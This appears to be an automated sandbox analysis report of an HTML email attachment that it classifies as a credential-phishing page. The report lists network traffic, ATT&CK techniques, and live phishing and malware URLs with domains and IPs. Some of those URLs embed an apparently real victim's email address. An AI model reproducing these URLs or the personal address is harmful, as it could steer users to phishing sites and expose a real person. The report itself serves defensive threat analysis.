      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49887 version: TLS 1.2
      Source: classification engineClassification label: mal92.phis.evad.winHTM@33/98@52/27
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT60255.HTM"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2320,i,10043383887662201719,1952149342407670854,262144 /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2320,i,10043383887662201719,1952149342407670854,262144 /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior

      Data Obfuscation

      barindex
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.au

      Stealing of Sensitive Information

      barindex
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.au
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Deobfuscate/Decode Files or Information
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      ATT60255.HTM0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
      https://developers.google.com/recaptcha/docs/faq#localhost_support0%URL Reputationsafe
      https://support.google.com/recaptcha#62627360%URL Reputationsafe
      https://support.google.com/recaptcha/?hl=en#62238280%URL Reputationsafe
      https://cloud.google.com/contact0%URL Reputationsafe
      https://support.google.com/recaptcha/#61759710%URL Reputationsafe
      https://support.google.com/recaptcha0%URL Reputationsafe
      https://cloud.google.com/recaptcha-enterprise/billing-information0%URL Reputationsafe
      https://recaptcha.net0%URL Reputationsafe
      https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que0%URL Reputationsafe
      https://www.gstatic.c..?/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__.0%URL Reputationsafe
      https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca0%URL Reputationsafe
      https://cdn.socket.io/4.6.0/socket.io.min.js0%URL Reputationsafe
      https://kpl2.r04ar2.com/ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230100%Avira URL Cloudphishing
      file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.au0%Avira URL Cloudsafe
      https://kpl2.r04ar2.com/90e3UQoFnPZnefHhdNMQPyz73100%Avira URL Cloudphishing
      https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t70%Avira URL Cloudsafe
      https://github.com/fent)0%Avira URL Cloudsafe
      https://kpl2.r04ar2.com/90BLxVXhpRTD45c1Cvst53100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136100%Avira URL Cloudphishing
      https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css0%Avira URL Cloudsafe
      https://kpl2.r04ar2.com/wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/12HMveiyHPabpIUo8913100%Avira URL Cloudphishing
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a60%Avira URL Cloudsafe
      https://www.google.com/recaptcha/api.js0%Avira URL Cloudsafe
      https://kpl2.r04ar2.com/12Vj5xeItpngol5p78GsRYKIFop50100%Avira URL Cloudphishing
      https://href.li/?https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.js0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b9f6497ee820fa4&lang=auto0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%Avira URL Cloudsafe
      https://www.google.com/recaptcha/api2/0%Avira URL Cloudsafe
      https://kpl2.r04ar2.com/xy7B16Rpqjcafef30100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/rsudZieQRPg934N9fbuv40100%Avira URL Cloudphishing
      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%Avira URL Cloudsafe
      https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond100%Avira URL Cloudphishing
      https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b9f6497ee820fa4/1724796641795/JJoPtCsZIVs8EyO0%Avira URL Cloudsafe
      https://kpl2.r04ar2.com/eflbaMIh8KvYQ56Fw0I2qKmn100100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/45lL7KipMN4YrD89WlFkKCVxy70100%Avira URL Cloudphishing
      https://a.nel.cloudflare.com/report/v4?s=sIxc%2BZUUEOrNpQDWB9EM7I7KmFejegSrUZkqAmRHFxitgwVo5ALHeTjQ8lJXvTyvY0hx3XK79w4PAfrQpGB%2FeUnI%2BYYGnE14edccKFBWCZEFC1LyJAV9TiVnbge89w%3D%3D0%Avira URL Cloudsafe
      https://kpl2.r04ar2.com/mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141100%Avira URL Cloudphishing
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8b9f6497ee820fa4/1724796641793/1d41b0915d96664d4c421588daa101f93a8179105dc076a56dbf01d319f547c8/wIkiMbIg4-l0Z4N0%Avira URL Cloudsafe
      https://play.google.com/log?format=json&hasfast=true0%Avira URL Cloudsafe
      https://a.nel.cloudflare.com/report/v4?s=M%2B3Hwfm5URa0VIteODWMU8DrfSEvhq2TVdS8YuOi20LAechWtbpiyhuqmicuzV2Bgmk6g52Ft91M1q3K0Ga0TX76s19zPo9ucrgRAgL%2FcN5%2BeBG%2F84dvq1celzyB%2Bw%3D%3D0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/0%Avira URL Cloudsafe
      https://kpl2.r04ar2.com/opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au100%Avira URL Cloudphishing
      https://nse.idwp.ru/srsldqgbwnlyknaiuilfjcyqoKGYnePGFJAVJGZCNGFCUJYLNOCYUZRFYFVSVVQBpqvHhnoPyzuWRNahuv40100%Avira URL Cloudmalware
      https://get.geojs.io/v1/ip/geo.json0%Avira URL Cloudsafe
      https://kpl2.r04ar2.com/apsDh9aBaVhYjUySTyaOt7dEJs5t100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193100%Avira URL Cloudphishing
      https://kpl2.r04ar2.com/lvytc1gAYeGHFHs4NJuMNMax70PlgNRGw39kizb100%Avira URL Cloudphishing
      https://wox.dultzman.ru/yujumitzgvwdmelzinmewQxtLOYJNEVXSSDHIHSVCETCIEVPNERHTXNUMDDPXUKLBBLLJCZAYXXBKOEQPMAUCC100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        unknown
        nse.idwp.ru
        104.21.67.3
        truefalse
          unknown
          wox.dultzman.ru
          188.114.97.3
          truefalse
            unknown
            github.com
            140.82.121.3
            truefalse
              unknown
              href.li
              192.0.78.26
              truetrue
                unknown
                kpl2.r04ar2.com
                188.114.96.3
                truefalse
                  unknown
                  code.jquery.com
                  151.101.130.137
                  truetrue
                    unknown
                    d2vgu95hoyrpkh.cloudfront.net
                    13.227.219.40
                    truefalse
                      unknown
                      cdnjs.cloudflare.com
                      104.17.25.14
                      truefalse
                        unknown
                        challenges.cloudflare.com
                        104.18.94.41
                        truefalse
                          unknown
                          get.geojs.io
                          172.67.70.233
                          truefalse
                            unknown
                            www.google.com
                            172.217.16.132
                            truefalse
                              unknown
                              d19d360lklgih4.cloudfront.net
                              13.33.187.68
                              truefalse
                                unknown
                                objects.githubusercontent.com
                                185.199.110.133
                                truefalse
                                  unknown
                                  cdn.socket.io
                                  unknown
                                  unknownfalse
                                    unknown
                                    ok4static.oktacdn.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://kpl2.r04ar2.com/90BLxVXhpRTD45c1Cvst53false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://code.jquery.com/jquery-3.6.0.min.jstrue
                                      • URL Reputation: safe
                                      unknown
                                      https://kpl2.r04ar2.com/90e3UQoFnPZnefHhdNMQPyz73false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.autrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://kpl2.r04ar2.com/opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://kpl2.r04ar2.com/12HMveiyHPabpIUo8913false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b9f6497ee820fa4&lang=autofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a6false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://kpl2.r04ar2.com/12Vj5xeItpngol5p78GsRYKIFop50false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://www.google.com/recaptcha/api.jsfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://kpl2.r04ar2.com/xy7B16Rpqjcafef30false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://href.li/?https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.autrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.jsfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://kpl2.r04ar2.com/ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/rsudZieQRPg934N9fbuv40false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://kpl2.r04ar2.com/34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/45lL7KipMN4YrD89WlFkKCVxy70false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWtrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/eflbaMIh8KvYQ56Fw0I2qKmn100false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b9f6497ee820fa4/1724796641795/JJoPtCsZIVs8EyOfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://a.nel.cloudflare.com/report/v4?s=sIxc%2BZUUEOrNpQDWB9EM7I7KmFejegSrUZkqAmRHFxitgwVo5ALHeTjQ8lJXvTyvY0hx3XK79w4PAfrQpGB%2FeUnI%2BYYGnE14edccKFBWCZEFC1LyJAV9TiVnbge89w%3D%3Dfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://kpl2.r04ar2.com/mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://a.nel.cloudflare.com/report/v4?s=M%2B3Hwfm5URa0VIteODWMU8DrfSEvhq2TVdS8YuOi20LAechWtbpiyhuqmicuzV2Bgmk6g52Ft91M1q3K0Ga0TX76s19zPo9ucrgRAgL%2FcN5%2BeBG%2F84dvq1celzyB%2Bw%3D%3Dfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8b9f6497ee820fa4/1724796641793/1d41b0915d96664d4c421588daa101f93a8179105dc076a56dbf01d319f547c8/wIkiMbIg4-l0Z4Nfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://nse.idwp.ru/srsldqgbwnlyknaiuilfjcyqoKGYnePGFJAVJGZCNGFCUJYLNOCYUZRFYFVSVVQBpqvHhnoPyzuWRNahuv40false
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://cdn.socket.io/4.6.0/socket.io.min.jsfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://kpl2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.aufalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://get.geojs.io/v1/ip/geo.jsonfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://kpl2.r04ar2.com/apsDh9aBaVhYjUySTyaOt7dEJs5tfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://kpl2.r04ar2.com/lvytc1gAYeGHFHs4NJuMNMax70PlgNRGw39kizbfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://wox.dultzman.ru/yujumitzgvwdmelzinmewQxtLOYJNEVXSSDHIHSVCETCIEVPNERHTXNUMDDPXUKLBBLLJCZAYXXBKOEQPMAUCCfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_165.2.dr, chromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://support.google.com/recaptcha#6262736chromecache_165.2.dr, chromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://support.google.com/recaptcha/?hl=en#6223828chromecache_165.2.dr, chromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://cloud.google.com/contactchromecache_165.2.dr, chromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://github.com/fent)chromecache_170.2.dr, chromecache_195.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://support.google.com/recaptcha/#6175971chromecache_165.2.dr, chromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.google.com/recaptcha/api2/chromecache_212.2.dr, chromecache_165.2.dr, chromecache_189.2.dr, chromecache_183.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://support.google.com/recaptchachromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://KPL2.r04ar2.com/KPL2/?em=natasha.hammondchromecache_173.2.drtrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_165.2.dr, chromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://recaptcha.netchromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_165.2.dr, chromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://play.google.com/log?format=json&hasfast=truechromecache_183.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.gstatic.c..?/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__.chromecache_165.2.dr, chromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_165.2.dr, chromecache_183.2.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.21.67.3
                                      nse.idwp.ruUnited States
                                      13335CLOUDFLARENETUSfalse
                                      104.18.94.41
                                      challenges.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      104.26.1.100
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      151.101.130.137
                                      code.jquery.comUnited States
                                      54113FASTLYUStrue
                                      142.250.185.164
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      18.245.31.5
                                      unknownUnited States
                                      16509AMAZON-02USfalse
                                      185.199.109.133
                                      unknownNetherlands
                                      54113FASTLYUSfalse
                                      13.227.219.40
                                      d2vgu95hoyrpkh.cloudfront.netUnited States
                                      16509AMAZON-02USfalse
                                      151.101.66.137
                                      unknownUnited States
                                      54113FASTLYUSfalse
                                      35.190.80.1
                                      a.nel.cloudflare.comUnited States
                                      15169GOOGLEUSfalse
                                      185.199.110.133
                                      objects.githubusercontent.comNetherlands
                                      54113FASTLYUSfalse
                                      104.17.24.14
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      65.9.86.56
                                      unknownUnited States
                                      16509AMAZON-02USfalse
                                      13.33.187.68
                                      d19d360lklgih4.cloudfront.netUnited States
                                      16509AMAZON-02USfalse
                                      140.82.121.3
                                      github.comUnited States
                                      36459GITHUBUSfalse
                                      216.58.206.68
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      192.0.78.26
                                      href.liUnited States
                                      2635AUTOMATTICUStrue
                                      239.255.255.250
                                      unknownReserved
                                      unknownunknownfalse
                                      188.114.97.3
                                      wox.dultzman.ruEuropean Union
                                      13335CLOUDFLARENETUSfalse
                                      188.114.96.3
                                      kpl2.r04ar2.comEuropean Union
                                      13335CLOUDFLARENETUSfalse
                                      172.67.70.233
                                      get.geojs.ioUnited States
                                      13335CLOUDFLARENETUSfalse
                                      172.217.16.132
